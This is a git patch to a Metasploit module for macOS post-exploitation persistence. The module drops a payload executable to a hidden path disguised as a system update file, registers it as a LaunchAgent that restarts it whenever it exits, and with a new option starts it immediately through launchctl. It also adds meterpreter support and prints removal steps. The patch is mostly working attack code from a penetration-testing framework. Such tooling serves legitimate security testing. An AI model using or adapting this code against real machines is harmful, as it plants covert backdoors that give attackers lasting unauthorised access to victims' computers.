From a2e3c6244e05132002e4fae3df207ff85dfe222b Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Fri, 18 Oct 2013 00:41:18 -0500
Subject: [PATCH] Remove unnecessary Exe::Custom logic. - this is handled by
 the exe.rb mixin. - adds support for a RUN_NOW datastore option. - tested
 working on java meterpreter and x86 shell session.

---
 modules/exploits/osx/local/persistence.rb | 72 +++++++++++------------
 1 file changed, 35 insertions(+), 37 deletions(-)

diff --git a/modules/exploits/osx/local/persistence.rb b/modules/exploits/osx/local/persistence.rb
index d4cb86290c..eea3242742 100644
--- a/modules/exploits/osx/local/persistence.rb
+++ b/modules/exploits/osx/local/persistence.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Local
       'Platform'      => [ 'osx' ],
       'Targets'       => [ [ 'Mac OS X', {} ] ],
       'DefaultTarget' => 0,
-      'SessionTypes'  => [ 'shell' ]
+      'SessionTypes'  => [ 'shell', 'meterpreter' ]
     ))
 
     register_options([
@@ -40,14 +40,11 @@ class Metasploit3 < Msf::Exploit::Local
         [true, 'Path to hide the backdoor on the target.', 
          '/Users/<user>/Library/.<random>/com.system.update']
       ),
-      OptBool.new('KEEPALIVE', 
+      OptBool.new('KEEPALIVE',
         [true, 'Continually restart the payload exe if it crashes/exits.', true]
-      )
-    ], self.class)
-
-    register_advanced_options([
-      OptPath.new('EXE::Custom',
-        [false, 'Use custom exe instead of automatically generating a payload exe']
+      ),
+      OptBool.new('RUN_NOW',
+        [false, 'Run the installed payload immediately.', false]
       )
     ], self.class)
   end
@@ -57,40 +54,23 @@ class Metasploit3 < Msf::Exploit::Local
     write_backdoor(generate_payload_exe)
     # Add plist file to LaunchAgents dir
     add_launchctl_item
+    # invoke the service if necessary
+    invoke_service if run_now?
+    # tell the user how to remove the persistence if necessary
+    list_removal_paths
   end
 
   private
 
-  # @return [String] an exe containing our payload 
-  def generate_payload_exe
-    if datastore.include? 'EXE::Custom'
-      get_custom_exe
-    else
-      super
-    end
-  end
-
-  # used when user has specified EXE::Custom datastore advanced option
-  # @return [String] custom exe file, from path specified in EXE::Custom
-  def get_custom_exe
-    custom_path = datastore['EXE::Custom']
-    print_status("Using custom payload #{path}, other payload settings will be ignored!")
-    datastore['DisablePayloadHandler'] = true
-    File.read(custom_path)
-  end
-
   # drops the file to disk, then makes it executable
   # @param [String] exe the executable to drop
   def write_backdoor(exe)
     print_status("Dropping backdoor executable...")
-    cmd_exec("mkdir -p", File.dirname(backdoor_path))
+    cmd_exec("mkdir -p #{File.dirname(backdoor_path).shellescape}")
 
     if write_file(backdoor_path, exe)
       print_good("Backdoor stored to #{backdoor_path}")
-      cmd_exec("chmod +x", backdoor_path)
-      # TODO: for java/python/php meterpreter payloads, this won't work.
-      # we could add some logic for dropping jar/py/php, then dropping a
-      # bash script that invokes java -jar or python or whatever.	
+      cmd_exec("chmod +x #{backdoor_path.shellescape}")
     else
       fail_with("Error dropping backdoor to #{backdoor_path}")
     end
@@ -99,12 +79,7 @@ class Metasploit3 < Msf::Exploit::Local
   # drops a LaunchAgent plist into the user's Library, which specifies to run backdoor_path
   def add_launchctl_item
     label = File.basename(backdoor_path)
-    plist_file = label + ".plist"
-    plist_path = "/Users/#{user}/Library/LaunchAgents/"
-    # just in case...
     cmd_exec("mkdir -p", plist_path)
-    # build the plist
-    plist_path = plist_path + plist_file
     item = <<-EOI
     <?xml version="1.0" encoding="UTF-8"?>
     <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@@ -126,13 +101,29 @@ class Metasploit3 < Msf::Exploit::Local
     </plist>
     EOI
 
-    if write_file(plist_path,item)
+    if write_file(plist_path, item)
       print_good("LaunchAgent added: #{plist_path}")
     else
       fail_with("Error writing LaunchAgent item to #{plist_path}")
     end
   end
 
+  # tells launchctl to start the service we dropped
+  def invoke_service
+    print_status("Starting the LaunchAgent")
+    cmd_exec("launchctl unload -w #{plist_path.shellescape}") # in case of previous persistence (unlikely)
+    cmd_exec("launchctl load -w #{plist_path.shellescape}")
+    cmd_exec("launchctl start #{File.basename(plist_path)}")
+  end
+
+  # useful if you want to remove the persistence.
+  # prints out a list of paths to remove and commands to run.
+  def list_removal_paths
+    files = [backdoor_path, plist_path]
+    run_cmd = "Then log out or run: launchctl unload -w #{plist_path.shellescape}"
+    print_status("To remove the persistence, delete the files:\n#{files.join("\n")}\n#{run_cmd}")
+  end
+
   # path to upload the backdoor. any <user> or <random> substrings will be replaced.
   # @return [String] path to drop the backdoor payload.
   def backdoor_path
@@ -141,7 +132,14 @@ class Metasploit3 < Msf::Exploit::Local
       .gsub('<user>', user))
   end
 
+  # path to the LaunchAgent service configuration plist
+  # @return [String] path to the LaunchAgent service
+  def plist_path
+    @plist ||= "/Users/#{user}/Library/LaunchAgents/#{File.basename(backdoor_path)}.plist"
+  end
+
   def keepalive?; datastore['KEEPALIVE']; end
+  def run_now?; datastore['RUN_NOW']; end
 
   # @return [String] username of the session
   def user